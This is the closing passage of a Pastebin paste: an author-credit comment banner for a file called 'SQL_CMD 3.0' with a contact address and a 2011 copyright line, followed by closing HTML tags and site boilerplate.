  1103. /*------------------------------------------------------------------*\
  1104. | ************          SQL_CMD 3.0 by al-swisre        *********** |
  1105. +------------------------------------------------------------------+
  1106. |                   حقوق الملف محفوظة لـ al-swisre                |
  1107. |                            oy3@hotmail.com                     |
  1108. |                           Copyright ©2011 .                   |
  1109. \*-----------------------------------------------------------*/
  1110. ->
  1111. </body>
  1112.  
  1113. </html>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!